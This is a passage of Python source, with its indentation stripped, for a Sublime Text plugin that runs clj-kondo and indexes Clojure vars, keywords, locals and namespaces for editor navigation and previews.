Returns a dictionary of keywords by (namespace, name).
'kindex' stands for 'keyword index'.
"""
return analysis.get("kindex", {})
def analysis_krn(analysis):
"""
Returns a dictionary of keywords by row.
This index can be used to quicky find a keyword by row.
'krn' stands for 'keyword row name'.
"""
return analysis.get("krn", {})
def analysis_vindex(analysis):
"""
Returns a dictionary of vars by (namespace, name).
'vindex' stands for 'var index'.
"""
return analysis.get("vindex", {})
def analysis_vindex_usages(analysis):
"""
Returns a dictionary of Var usages by (namespace, name).
'vindex_usages' stands for 'Var index'.
"""
return analysis.get("vindex_usages", {})
def analysis_vrn(analysis):
"""
Returns a dictionary of Vars by row.
This index can be used to quicky find a Var definition by row.
'vrn' stands for 'var row name'.
"""
return analysis.get("vrn", {})
def analysis_vrn_usages(analysis):
"""
Returns a dictionary of Var usages by row.
This index can be used to quicky find a Var usage by row.
'vrn' stands for 'var row name'.
"""
return analysis.get("vrn_usages", {})
def analysis_lindex(analysis):
"""
Returns a dictionary of locals by ID.
This index can be used to find a local in constant time if you know its ID.
When finding usages from a usage itself, the first step is to find the usage,
once you have found it, you can use its ID to find the local.
Locals and usages have the same ID,
so it's possible to corretale a usage with a local.
'lindex' stands for 'local index'.
"""
return analysis.get("lindex", {})
def analysis_lrn(analysis):
"""
Returns a dictionary of locals by row.
This index can be used to quicky find a local definition by row.
Example: (let [a| 1] ...)
'lrn' stands for 'local row name'.
"""
return analysis.get("lrn", {})
def analysis_lrn_usages(analysis):
"""
Returns a dictionary of local usages by row.
This index can be used to quicky find a local usage by row.
Example: (let [a 1] |a)
'lrn' stands for 'local row name'.
"""
return analysis.get("lrn_usages", {})
def analysis_nindex(analysis):
"""
Returns a dictionary of namespace definition by name.
'nindex' stands for 'Namespace index'.
"""
return analysis.get("nindex", {})
def analysis_nindex_usages(analysis):
"""
Returns a dictionary of namespace usages by name.
'nindex' stands for 'namespace index'.
"""
return analysis.get("nindex_usages", {})
def analysis_nrn(analysis):
"""
Returns a dictionary of namespaces by row.
"""
return analysis.get("nrn", {})
def analysis_nrn_usages(analysis):
"""
Returns a dictionary of namespace usages by row.
This index can be used to quicky find a namespace usage by row.
'nrn' stands for 'namespace row name'.
"""
return analysis.get("nrn_usages", {})
def namespace_definitions(analysis):
"""
Returns a list of namespace definitions.
"""
l = []
for namespace_definitions in analysis_nindex(analysis).values():
for namespace_definition in namespace_definitions:
l.append(namespace_definition)
return l
def var_definitions(analysis):
"""
Returns a list of var definitions.
"""
l = []
for var_definitions in analysis_vindex(analysis).values():
for var_definition in var_definitions:
l.append(var_definition)
return l
def var_usages(analysis, name):
"""
Returns Var usages for name.
"""
usages = analysis_vindex_usages(analysis).get(name, [])
return remove_empty_rows(usages)
def recursive_usage(thingy_usage):
usage_from = thingy_usage.get("from")
usage_to = thingy_usage.get("to")
usage_name = thingy_usage.get("name")
usage_from_var = thingy_usage.get("from-var")
is_same_ns = usage_from == usage_to
is_same_var = usage_name == usage_from_var
return is_same_ns and is_same_var
def namespace_index(
analysis,
nindex=True,
nindex_usages=True,
nrn=True,
nrn_usages=True,
):
"""
Index namespace definitions and usages.
Definitions are indexed by name and file extension.
Usages are indexed by name.
Returns dict with keys 'nindex', 'nindex_usages', 'nrn', 'nrn_usages'.
"""
namespace_definitions = analysis.get("namespace-definitions", [])
# Namespace definitions indexed by name.
nindex_ = {}
# Namespace definitions indexed by row.
nrn_ = {}
if nindex or nrn:
for namespace_definition in namespace_definitions:
if nindex:
name = namespace_definition.get("name")
nindex_.setdefault(name, []).append(namespace_definition)
if nrn:
name_row = namespace_definition.get("name-row")
nrn_.setdefault(name_row, []).append(namespace_definition)
# Namespace usages indexed by name.
nindex_usages_ = {}
# Var usages indexed by row.
nrn_usages_ = {}
if nindex_usages or nrn_usages:
for namespace_usage in analysis.get("namespace-usages", []):
if nindex_usages:
name = namespace_usage.get("to")
nindex_usages_.setdefault(name, []).append(namespace_usage)
if nrn_usages:
name_row = namespace_usage.get("name-row")
nrn_usages_.setdefault(name_row, []).append(namespace_usage)
# Index alias row (in case there's one).
# Note: It's possible to have both the name and alias in the same row.
if namespace_usage.get("alias"):
alias_row = namespace_usage.get("alias-row")
nrn_usages_.setdefault(alias_row, []).append(namespace_usage)
return {
"nindex": nindex_,
"nindex_usages": nindex_usages_,
"nrn": nrn_,
"nrn_usages": nrn_usages_,
}
def keyword_index(
analysis,
kindex=True,
):
# Keywords indexed by name - tuple of namespace and name.
kindex_ = {}
if kindex:
for keyword in analysis.get("keywords", []):
ns = keyword.get("ns")
name = keyword.get("name")
row = keyword.get("row")
kindex_.setdefault((ns, name), []).append(keyword)
return {
"kindex": kindex_,
}
def var_index(
analysis,
vindex=True,
vindex_usages=True,
vrn=True,
vrn_usages=True,
):
# Vars indexed by row.
vrn_ = {}
# Vars indexed by namespace and name.
vindex_ = {}
if vindex or vrn:
for var_definition in analysis.get("var-definitions", []):
if vindex:
ns = var_definition.get("ns")
name = var_definition.get("name")
vindex_.setdefault((ns, name), []).append(var_definition)
if vrn:
name_row = var_definition.get("name-row")
vrn_.setdefault(name_row, []).append(var_definition)
# Var usages indexed by row.
vrn_usages_ = {}
# Var usages indexed by name - var name to a set of var usages.
vindex_usages_ = {}
if vindex_usages or vrn_usages:
for var_usage in analysis.get("var-usages", []):
if vindex_usages:
ns = var_usage.get("to")
name = var_usage.get("name")
vindex_usages_.setdefault((ns, name), []).append(var_usage)
if vrn_usages:
name_row = var_usage.get("name-row")
vrn_usages_.setdefault(name_row, []).append(var_usage)
return {
"vindex": vindex_,
"vrn": vrn_,
"vindex_usages": vindex_usages_,
"vrn_usages": vrn_usages_,
}
# ---
def file_extension(filename):
if filename:
return pathlib.Path(filename).suffix
def remove_empty_rows(thingies):
"""
For some reason, maybe a clj-kondo bug, a Var usage might have a None row.
This function is suitable for any thingy data - not only Var usages.
"""
return [thingy_data for thingy_data in thingies if thingy_data["row"] != None]
def staled_analysis(view):
"""
Returns True if view was modified since last analysis.
"""
return view.change_count() != analysis_view_change_count(view)
def view_navigation(view_state):
return view_state.get("navigation", {})
def set_view_navigation(view_state, navigation):
view_state["navigation"] = navigation
def project_path(window):
return window.extract_variables().get("project_path")
def project_data_classpath(window):
"""
Example:
["clojure", "-Spath"]
"""
if project_data := window.project_data():
return project_data.get("pep", {}).get("classpath")
def project_data_paths(window):
"""
Example:
["src", "test"]
"""
if project_data := window.project_data():
return project_data.get("pep", {}).get("paths")
# ---
# Copied from https://github.com/SublimeText/UnitTesting/blob/master/unittesting/utils/progress_bar.py
class ProgressBar:
def __init__(self, label, width=10):
self.label = label
self.width = width
def start(self):
self.done = False
self.update()
def stop(self):
sublime.status_message("")
self.done = True
def update(self, status=0):
if self.done:
return
status = status % (2 * self.width)
before = min(status, (2 * self.width) - status)
after = self.width - before
sublime.status_message("%s [%s=%s]" % (self.label, " " * before, " " * after))
sublime.set_timeout(lambda: self.update(status + 1), 100)
# Copied from https://github.com/eerohele/Tutkain
def htmlify(text):
if text:
return re.sub(r"\n", "<br/>", inspect.cleandoc(html.escape(text)))
else:
return ""
def thingy_location(thingy_data):
"""
Thingy (data) is one of: Var definition, Var usage, local binding, or local usage.
"""
if thingy_data and (filename := thingy_data.get("filename")):
return {
"filename": filename,
"line": thingy_data.get("name-row") or thingy_data.get("row"),
"column": thingy_data.get("name-col") or thingy_data.get("col"),
}
def with_jar(filename, f):
"""
Open JAR `filename` and call `f` with filename and a file-like object (ZipExtFile).
Filename passed to `f` is a temporary file and it will be removed afterwards.
"""
filename_split = filename.split(":")
filename_jar = filename_split[0]
filename_file = filename_split[1]
with ZipFile(filename_jar) as jar:
with jar.open(filename_file) as jar_file:
tmp_path = pathlib.Path(filename_file)
tmp_file_suffix = "." + tmp_path.name
descriptor, tempath = tempfile.mkstemp(suffix=tmp_file_suffix)
with os.fdopen(descriptor, "w") as file:
file.write(jar_file.read().decode())
f(tempath, jar_file)
def getlines(filename, begin, end):
"""
Returns a list of lines read from filename.
`end` is inclusive.
"""
return [linecache.getline(filename, lineno) for lineno in range(begin, end + 1)]
def goto(window, location, flags=sublime.ENCODED_POSITION):
if location:
filename = location["filename"]
line = location["line"]
column = location["column"]
if ".jar:" in filename:
def open_file(filename, file):
view = window.open_file(f"{filename}:{line}:{column}", flags=flags)
view.set_scratch(True)
view.set_read_only(True)
with_jar(filename, open_file)
else:
return window.open_file(f"{filename}:{line}:{column}", flags=flags)
def namespace_quick_panel_item(thingy_data):
namespace_name = thingy_data.get("name", thingy_data.get("to", ""))
namespace_filename = thingy_data.get("filename", "")
return sublime.QuickPanelItem(
namespace_name,
kind=(sublime.KIND_ID_NAMESPACE, "n", ""),
annotation=pathlib.Path(namespace_filename).suffix.replace(".", ""),
)
def var_quick_panel_item(thingy_data):
var_namespace = thingy_data.get("ns", thingy_data.get("to", ""))
var_name = thingy_data.get("name", "")
var_arglist = thingy_data.get("arglist-strs", [])
var_filename = thingy_data.get("filename", "")
trigger = f"{var_namespace}/{var_name}"
if var_arglist:
return sublime.QuickPanelItem(
trigger,
kind=sublime.KIND_FUNCTION,
details=" ".join(var_arglist),
annotation=pathlib.Path(var_filename).suffix.replace(".", ""),
)
else:
return sublime.QuickPanelItem(
trigger,
kind=sublime.KIND_VARIABLE,
annotation=pathlib.Path(var_filename).suffix.replace(".", ""),
)
def thingy_quick_panel_item(thingy_type, thingy_data):
if (
thingy_type == TT_NAMESPACE_DEFINITION
or thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
return namespace_quick_panel_item(thingy_data)
elif thingy_type == TT_VAR_DEFINITION or thingy_type == TT_VAR_USAGE:
return var_quick_panel_item(thingy_data)
def var_goto_items(analysis):
items_ = []
for var_definition in var_definitions(analysis):
var_namespace = var_definition.get("ns", "")
var_name = var_definition.get("name", "")
var_arglist = var_definition.get("arglist-strs", [])
var_filename = var_definition.get("filename", "")
trigger = f"{var_namespace}/{var_name}"
items_.append(
{
"thingy_type": TT_VAR_DEFINITION,
"thingy_data": var_definition,
"quick_panel_item": var_quick_panel_item(var_definition),
}
)
return items_
def keyword_goto_items(analysis):
items_ = []
for keywords_ in analysis_kindex(analysis).values():
for keyword_ in keywords_:
if reg := keyword_.get("reg", None):
keyword_namespace = keyword_.get("ns", "")
keyword_name = keyword_.get("name", "")
keyword_filename = keyword_.get("filename", "")
trigger = ":" + (
f"{keyword_namespace}/{keyword_name}"
if keyword_namespace
else keyword_name
)
items_.append(
{
"thingy_type": TT_KEYWORD,
"thingy_data": keyword_,
"quick_panel_item": sublime.QuickPanelItem(
trigger,
kind=sublime.KIND_KEYWORD,
details=reg,
annotation=pathlib.Path(keyword_filename).suffix.replace(
".", ""
),
),
}
)
return items_
def namespace_goto_items(analysis):
items_ = []
for namespace_definition in namespace_definitions(analysis):
namespace_name = namespace_definition.get("name", "")
namespace_filename = namespace_definition.get("filename", "")
items_.append(
{
"thingy_type": TT_NAMESPACE_DEFINITION,
"thingy_data": namespace_definition,
"quick_panel_item": namespace_quick_panel_item(namespace_definition),
}
)
return items_
def preview_thingy(window, thingy_type, thingy_data):
def peek_params(thingy_type, thingy_data):
ns_ = thingy_data.get("ns", None)
name_ = thingy_data.get("name", None)
text_ = None
syntax_ = None
if thingy_type == TT_KEYWORD:
text_ = f"{ns_}/{name_}" if ns_ else name_
text_ = text_ + "\n\n" + thingy_data.get("reg", "")
elif thingy_type == TT_VAR_DEFINITION:
lineno_begin = thingy_data.get("row", thingy_data.get("name-row"))
lineno_end = thingy_data.get("end-row", thingy_data.get("name-end-row"))
thingy_filename = thingy_data["filename"]
# TODO: Try to use the same syntax as the "origin".
syntax_ = "Clojure.sublime-syntax"
if ".jar:" in thingy_filename:
def read_jar_source(filename, file):
nonlocal text_
text_ = "".join(getlines(filename, lineno_begin, lineno_end))
with_jar(thingy_filename, read_jar_source)
else:
text_ = "".join(getlines(thingy_filename, lineno_begin, lineno_end))
elif thingy_type == TT_NAMESPACE_DEFINITION:
text_ = name_
# Doc (optional)
if doc_ := thingy_data.get("doc"):
text_ = text_ + "\n\n" + re.sub(r"^ +", "", doc_, flags=re.M)
else:
text_ = f"{ns_}/{name_}" if ns_ else name_
return {
"characters": text_,
"syntax": syntax_ or "Packages/Text/Plain text.tmLanguage",
}
params = peek_params(thingy_type, thingy_data)
peek_characters = params["characters"]
peek_syntax = params["syntax"]
output_view_ = output_panel(window)
output_view_.set_read_only(False)
output_view_.assign_syntax(peek_syntax)
output_view_.settings().set("line_numbers", False)
output_view_.settings().set("gutter", False)
output_view_.settings().set("is_widget", True)
output_view_.run_command("select_all")
output_view_.run_command("right_delete")
output_view_.run_command(
"append",
{
"characters": peek_characters,
},
)
output_view_.set_read_only(True)
show_output_panel(window)
def show_goto_thingy_quick_panel(window, items):
def on_done(index):
if index != -1:
thingy_data_ = items[index]["thingy_data"]
location = thingy_location(thingy_data_)
goto(window, location)
quick_panel_items = [item_["quick_panel_item"] for item_ in items]
window.show_quick_panel(
quick_panel_items,
on_done,
)
## ---
def settings():
return sublime.load_settings("Pep.sublime-settings")
def debug():
return settings().get("debug", False)
def automatically_highlight():
return settings().get("automatically_highlight", False)
def annotate_view_analysis():
return settings().get("annotate_view_analysis", False)
def set_view_name(view, name):
if view:
if view.is_loading():
sublime.set_timeout(lambda: set_view_name(view, name), 100)
else:
view.set_name(name)
def view_text(view):
return view.substr(sublime.Region(0, view.size()))
def clj_kondo_path():
# Bundled:
# os.path.join(sublime.packages_path(), "Pep", "bin", "clj-kondo")
#
# TODO: Setting to configure clj-kondo path.
return "clj-kondo"
def project_classpath(window):
"""
Returns the project classpath, or None if a classpath setting does not exist.
It reads a custom "pep classpath" setting in the project file.
Example.sublime-project:
{
...
"pep": {
"classpath": ["clojure", "-Spath"]
}
}
"""
if classpath := project_data_classpath(window):
classpath_completed_process = subprocess.run(
classpath, cwd=project_path(window), text=True, capture_output=True
)
classpath_completed_process.check_returncode()
return classpath_completed_process.stdout
## ---
def analyze_view_clj_kondo(view):
try:
window = view.window()
view_file_name = view.file_name()
project_file_name = window.project_file_name() if window else None
# Setting the working directory is important because of clj-kondo's cache.
cwd = None
if project_file_name:
cwd = os.path.dirname(project_file_name)
elif view_file_name:
cwd = os.path.dirname(view_file_name)
analysis_config = f"""{{:output {{:analysis {{:arglists true :locals true :keywords true}} :format :json :canonical-paths true}} }}"""
# --lint <file>: a file can either be a normal file, directory or classpath.
# In the case of a directory or classpath, only .clj, .cljs and .cljc will be processed.
# Use - as filename for reading from stdin.
# --filename <file>: in case stdin is used for linting, use this to set the reported filename.
analysis_subprocess_args = [
clj_kondo_path(),
"--config",
analysis_config,
"--lint",
"-",
"--filename",
view_file_name or "-",
]
analysis_completed_process = subprocess.run(
analysis_subprocess_args,
cwd=cwd,
text=True,
capture_output=True,
input=view_text(view),
)
return json.loads(analysis_completed_process.stdout)
except:
# Always return a dict, no matter what.
return {}
def analyze_view(view, on_completed=None):
# Change count right before analyzing the view.
# This will be stored in the analysis.
view_change_count = view.change_count()
clj_kondo_data = analyze_view_clj_kondo(view)
analysis = clj_kondo_data.get("analysis", {})
# Keywords indexed by row.
krn = {}
# Keywords indexed by name - tuple of namespace and name.
kindex = {}
for keyword in analysis.get("keywords", []):
ns = keyword.get("ns")
name = keyword.get("name")
row = keyword.get("row")
krn.setdefault(row, []).append(keyword)
kindex.setdefault((ns, name), []).append(keyword)
# Locals indexed by row.
lrn = {}
# Locals indexed by ID.
lindex = {}
for local_binding in analysis.get("locals", []):
id = local_binding.get("id")
row = local_binding.get("row")
lrn.setdefault(row, []).append(local_binding)
lindex[id] = local_binding
# Local usages indexed by ID - local binding ID to a set of local usages.
lindex_usages = {}
# Local usages indexed by row.
lrn_usages = {}
for local_usage in analysis.get("local-usages", []):
id = local_usage.get("id")
name_row = local_usage.get("name-row")
lindex_usages.setdefault(id, []).append(local_usage)
lrn_usages.setdefault(name_row, []).append(local_usage)
view_analysis_ = {
"view_change_count": view_change_count,
"findings": clj_kondo_data.get("findings", {}),
"summary": clj_kondo_data.get("summary", {}),
"kindex": kindex,
"krn": krn,
"lindex": lindex,
"lindex_usages": lindex_usages,
"lrn": lrn,
"lrn_usages": lrn_usages,
}
namespace_index_ = namespace_index(analysis)
var_index_ = var_index(analysis)
set_view_analysis(
view.id(),
{
**namespace_index_,
**var_index_,
**view_analysis_,
},
)
if on_completed:
on_completed(view_analysis_)
return True
def analyze_view_async(view, on_completed=None):
threading.Thread(
target=lambda: analyze_view(view, on_completed=on_completed), daemon=True
).start()
def analyze_classpath(window):
"""
Analyze classpath to create indexes for var and namespace definitions.
"""
is_debug = settings().get("debug", False)
if classpath := project_classpath(window):
print(f"(Pep) Analyzing classpath... (Project: {project_path(window)})")
analysis_config = f"""{{:output {{:analysis {{:arglists true :keywords true}} :format :json :canonical-paths true}} }}"""
analysis_subprocess_args = [
clj_kondo_path(),
"--config",
analysis_config,
"--parallel",
"--lint",
classpath,
]
if is_debug:
print("(Pep) clj-kondo\n", pprint.pformat(analysis_subprocess_args))
analysis_completed_process = subprocess.run(
analysis_subprocess_args,
cwd=project_path(window),
text=True,
capture_output=True,
)
output = None
try:
output = json.loads(analysis_completed_process.stdout)
except:
output = {}
analysis = output.get("analysis", {})
keyword_index_ = keyword_index(analysis)
# There's no need to index namespace usages in the classpath.
namespace_index_ = namespace_index(
analysis,
nindex_usages=False,
nrn=False,
nrn_usages=False,
)
# There's no need to index var usages in the classpath.
var_index_ = var_index(
analysis,
vindex_usages=False,
vrn=False,
vrn_usages=False,
)
set_classpath_analysis(
project_path(window),
{
**keyword_index_,
**namespace_index_,
**var_index_,
},
)
print(
f"(Pep) Classpath analysis is completed (Project: {project_path(window)})"
)
def analyze_classpath_async(window):
threading.Thread(target=lambda: analyze_classpath(window), daemon=True).start()
def analyze_paths(window):
"""
Analyze paths to create indexes for var and namespace definitions, and keywords.
"""
is_debug = settings().get("debug", False)
if paths := project_data_paths(window):
classpath = ":".join(paths)
print(
f"(Pep) Analyzing paths... (Project: {project_path(window)}, Paths {paths})"
)
analysis_config = f"""{{:output {{:analysis {{:arglists true :keywords true}} :format :json :canonical-paths true}} }}"""
analysis_subprocess_args = [
clj_kondo_path(),
"--config",
analysis_config,
"--parallel",
"--lint",
classpath,
]
if is_debug:
print("(Pep) clj-kondo\n", pprint.pformat(analysis_subprocess_args))
analysis_completed_process = subprocess.run(
analysis_subprocess_args,
cwd=project_path(window),
text=True,
capture_output=True,
)
output = None
try:
output = json.loads(analysis_completed_process.stdout)
except:
output = {}
analysis = output.get("analysis", {})
# Keywords indexed by name - tuple of namespace and name.
kindex = {}
for keyword in analysis.get("keywords", []):
ns = keyword.get("ns")
name = keyword.get("name")
row = keyword.get("row")
kindex.setdefault((ns, name), []).append(keyword)
keyword_index_ = keyword_index(analysis)
namespace_index_ = namespace_index(
analysis,
nrn=False,
nrn_usages=False,
)
var_index_ = var_index(
analysis,
vrn=False,
vrn_usages=False,
)
set_paths_analysis(
project_path(window),
{
**keyword_index_,
**namespace_index_,
**var_index_,
},
)
print(
f"(Pep) Paths analysis is completed (Project {project_path(window)}, Paths {paths})"
)
def analyze_paths_async(window):
threading.Thread(target=lambda: analyze_paths(window), daemon=True).start()
## ---
def erase_analysis_regions(view):
view.erase_regions("pg_pep_analysis_error")
view.erase_regions("pg_pep_analysis_warning")
# ---
def keyword_region(view, keyword_usage):
"""
Returns the Region of a keyword_usage.
"""
row_start = keyword_usage["row"]
col_start = keyword_usage["col"]
row_end = keyword_usage["end-row"]
col_end = keyword_usage["end-col"]
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def namespace_region(view, namespace):
"""
Returns a Region of a namespace usage.
"""
row_start = namespace.get("name-row")
col_start = namespace.get("name-col")
row_end = namespace.get("name-end-row")
col_end = namespace.get("name-end-col")
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def namespace_definition_region(view, namespace_definition):
"""
Returns a Region of a namespace definition.
"""
return namespace_region(view, namespace_definition)
def namespace_usage_region(view, namespace_usage):
"""
Returns a Region of a namespace usage.
"""
return namespace_region(view, namespace_usage)
def namespace_usage_alias_region(view, namespace_usage):
"""
Returns a Region of a namespace usage.
"""
if namespace_usage.get("alias"):
row_start = namespace_usage.get("alias-row")
col_start = namespace_usage.get("alias-col")
row_end = namespace_usage.get("alias-end-row")
col_end = namespace_usage.get("alias-end-col")
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def local_usage_region(view, local_usage):
"""
Returns the Region of a local usage.
"""
name_row_start = local_usage["name-row"]
name_col_start = local_usage["name-col"]
name_row_end = local_usage["name-end-row"]
name_col_end = local_usage["name-end-col"]
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = view.text_point(name_row_end - 1, name_col_end - 1)
return sublime.Region(name_start_point, name_end_point)
def local_binding_region(view, local_binding):
"""
Returns the Region of a local binding.
"""
row_start = local_binding.get("name-row") or local_binding.get("row")
col_start = local_binding.get("name-col") or local_binding.get("col")
row_end = local_binding.get("name-end-row") or local_binding.get("end-row")
col_end = local_binding.get("name-end-col") or local_binding.get("end-col")
start_point = view.text_point(row_start - 1, col_start - 1)
end_point = view.text_point(row_end - 1, col_end - 1)
return sublime.Region(start_point, end_point)
def var_definition_region(view, var_definition):
"""
Returns the Region of a Var definition.
"""
name_row_start = var_definition["name-row"]
name_col_start = var_definition["name-col"]
name_row_end = var_definition["name-end-row"]
name_col_end = var_definition["name-end-col"]
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = view.text_point(name_row_end - 1, name_col_end - 1)
return sublime.Region(name_start_point, name_end_point)
def var_usage_region(view, var_usage):
"""
Returns the Region of a Var usage.
"""
name_row_start = var_usage.get("name-row") or var_usage.get("row")
name_col_start = var_usage.get("name-col") or var_usage.get("col")
name_row_end = var_usage.get("name-end-row") or var_usage.get("end-row")
name_col_end = var_usage.get("name-end-col") or var_usage.get("end-col")
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = view.text_point(name_row_end - 1, name_col_end - 1)
return sublime.Region(name_start_point, name_end_point)
def var_usage_namespace_region(view, var_usage):
"""
Returns the namespace Region of var_usage, or None.
For some (odd) reason, a var_usage might not have name row & col.
"""
try:
name_row_start = var_usage["name-row"]
name_col_start = var_usage["name-col"]
name_row_end = var_usage["name-end-row"]
name_col_end = var_usage["name-end-col"]
alias = var_usage.get("alias")
# If a var doesn't have an alias, its name is the region.
# But if a var has an alias, alias is the region.
name_start_point = view.text_point(name_row_start - 1, name_col_start - 1)
name_end_point = (
name_start_point + len(alias)
if alias
else view.text_point(name_row_end - 1, name_col_end - 1)
)
return sublime.Region(name_start_point, name_end_point)
except:
return None
# ---
def keyword_in_region(view, krn, region):
"""
Try to find a keyword in region using the krn index.
"""
region_begin_row, _ = view.rowcol(region.begin())
keywords = krn.get(region_begin_row + 1, [])
for keyword in keywords:
_region = keyword_region(view, keyword)
if _region.contains(region):
return (_region, keyword)
def namespace_definition_in_region(view, nrn, region):
region_begin_row, _ = view.rowcol(region.begin())
for namespace_definition in nrn.get(region_begin_row + 1, []):
_region = namespace_definition_region(view, namespace_definition)
if _region.contains(region):
return (_region, namespace_definition)
def namespace_usage_in_region(view, nrn_usages, region):
region_begin_row, _ = view.rowcol(region.begin())
for namespace_usage in nrn_usages.get(region_begin_row + 1, []):
_region = namespace_usage_region(view, namespace_usage)
if _region.contains(region):
return (_region, namespace_usage)
def namespace_usage_alias_in_region(view, nrn_usages, region):
region_begin_row, _ = view.rowcol(region.begin())
for namespace_usage in nrn_usages.get(region_begin_row + 1, []):
if _region := namespace_usage_alias_region(view, namespace_usage):
if _region.contains(region):
return (_region, namespace_usage)
def local_usage_in_region(view, lrn_usages, region):
"""
Local usage dictionary, or None.
Try to find a local usage in the index (lrn_usages).
"""
region_begin_row, _ = view.rowcol(region.begin())
usages = lrn_usages.get(region_begin_row + 1, [])
for usage in usages:
_region = local_usage_region(view, usage)
if _region.contains(region):
return (_region, usage)
def local_binding_in_region(view, lrn, region):
region_begin_row, _ = view.rowcol(region.begin())
for local_binding in lrn.get(region_begin_row + 1, []):
_region = local_binding_region(view, local_binding)
if _region.contains(region):
return (_region, local_binding)
def var_usage_in_region(view, vrn_usages, region):
region_begin_row, _ = view.rowcol(region.begin())
for var_usage in vrn_usages.get(region_begin_row + 1, []):
_region = var_usage_region(view, var_usage)
if _region.contains(region):
return (_region, var_usage)
def var_definition_in_region(view, vrn, region):
region_begin_row, _ = view.rowcol(region.begin())
for var_definition in vrn.get(region_begin_row + 1, []):
_region = var_definition_region(view, var_definition)
if _region.contains(region):
return (_region, var_definition)
# ---
def thingy_file_extensions(thingy_data):
"""
Returns a set of file extensions in which a thingy might be defined.
Thingy in a cljc file might be defined in clj, cljs and cljc.
Thingy in clj or cljs might be defined in cljc or same as its file extension.
"""
if file_extension_ := file_extension(thingy_data.get("filename")):
return (
{".clj", ".cljs", ".cljc"}
if file_extension_ == ".cljc"
else {file_extension_, ".cljc"}
)
else:
return {".clj"}
def thingy_kind(thingy_type, thingy_data):
"""
Mapping of thingy type to kind.
"""
if thingy_type == TT_KEYWORD:
return sublime.KIND_KEYWORD
elif thingy_type == TT_LOCAL_BINDING:
return (sublime.KIND_ID_VARIABLE, "v", "Local binding")
elif thingy_type == TT_LOCAL_USAGE:
return (sublime.KIND_ID_VARIABLE, "v", "Local usage")
elif thingy_type == TT_VAR_DEFINITION:
return (
sublime.KIND_FUNCTION
if thingy_data.get("arglist-strs")
else sublime.KIND_VARIABLE
)
elif thingy_type == TT_VAR_USAGE:
return (
sublime.KIND_FUNCTION
if thingy_data.get("arglist-strs")
else sublime.KIND_VARIABLE
)
elif (
thingy_type == TT_NAMESPACE_DEFINITION
or thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
return (sublime.KIND_ID_NAMESPACE, "n", "Namespace")
else:
return sublime.KIND_AMBIGUOUS
def thingy_sel_region(view):
"""
Thingy region is no special region, is simply the first one in the selection.
Most of the time, the first region is what you're looking for.
"""
return view.sel()[0]
def thingy_in_region(view, analysis, region):
"""
Tuple of type, region and data.
Thingy is not a good name, but what to call something that
can be a local binding, local usage, Var definition, or Var usage?
It's difficult to find a good name for it.
A thingy is a triple:
- Type:
- Local binding
- Local usage
- Var definition
- Var usage
- Namespace definition
- Namespace usage
- Namespace usage alias
- Keywords
- Region for the symbol
- The thingy itself - clj-kondo data.
"""
# 1. Try keywords.
thingy_region, thingy_data = keyword_in_region(
view, analysis.get("krn", {}), region
) or (None, None)
if thingy_data:
return ("keyword", thingy_region, thingy_data)
# 2. Try local usages.
thingy_region, thingy_data = local_usage_in_region(
view, analysis.get("lrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("local_usage", thingy_region, thingy_data)
# 3. Try Var usages.
thingy_region, thingy_data = var_usage_in_region(
view, analysis.get("vrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("var_usage", thingy_region, thingy_data)
# 4. Try local bindings.
thingy_region, thingy_data = local_binding_in_region(
view, analysis.get("lrn", {}), region
) or (None, None)
if thingy_data:
return ("local_binding", thingy_region, thingy_data)
# 5. Try Var definitions.
thingy_region, thingy_data = var_definition_in_region(
view, analysis.get("vrn", {}), region
) or (None, None)
if thingy_data:
return ("var_definition", thingy_region, thingy_data)
# 6. Try namespace usages.
thingy_region, thingy_data = namespace_usage_in_region(
view, analysis.get("nrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("namespace_usage", thingy_region, thingy_data)
# 7. Try namespace usages alias.
thingy_region, thingy_data = namespace_usage_alias_in_region(
view, analysis.get("nrn_usages", {}), region
) or (None, None)
if thingy_data:
return ("namespace_usage_alias", thingy_region, thingy_data)
# 8. Try namespace definitions.
thingy_region, thingy_data = namespace_definition_in_region(
view, analysis.get("nrn", {}), region
) or (None, None)
if thingy_data:
return ("namespace_definition", thingy_region, thingy_data)
# ---
def find_keywords(analysis, keyword):
keyword_qualified_name = (keyword.get("ns"), keyword.get("name"))
return analysis.get("kindex", {}).get(keyword_qualified_name, [])
def find_keyword_usages(analysis, keyword):
keywords = find_keywords(analysis, keyword)
return [keyword for keyword in keywords if not keyword.get("reg")]
def find_local_binding(analysis, local_usage):
return analysis_lindex(analysis).get(local_usage.get("id"))
def find_local_usages(analysis, local_binding_or_usage):
return analysis.get("lindex_usages", {}).get(local_binding_or_usage.get("id"), [])
def find_var_definition(analysis, thingy_data):
"""
Returns a var definition thingy data or None.
"""
ns = thingy_data.get("ns", thingy_data.get("to"))
name = thingy_data.get("name")
vindex = analysis_vindex(analysis)
file_extensions = thingy_file_extensions(thingy_data)
for var_definition in vindex.get((ns, name), []):
definition_file_extension = None
if file_extension_ := file_extension(var_definition.get("filename")):
definition_file_extension = file_extension_
else:
definition_file_extension = ".clj"
if definition_file_extension in file_extensions:
return var_definition
def find_var_usages(analysis, thingy_data):
var_ns = thingy_data.get("ns") or thingy_data.get("to")
var_name = thingy_data.get("name")
return var_usages(analysis, (var_ns, var_name))
def find_namespace_definition(analysis, thingy_data):
"""
Returns a namespace definition thingy data or None.
"""
name = thingy_data.get("name", thingy_data.get("to"))
nindex = analysis_nindex(analysis)
file_extensions = thingy_file_extensions(thingy_data)
for namespace_definition in nindex.get(name, []):
definition_file_extension = None
if file_extension_ := file_extension(namespace_definition.get("filename")):
definition_file_extension = file_extension_
else:
definition_file_extension = ".clj"
if definition_file_extension in file_extensions:
return namespace_definition
def find_namespace_usages(analysis, namespace_definition):
"""
Returns usages of namespace_definition.
"""
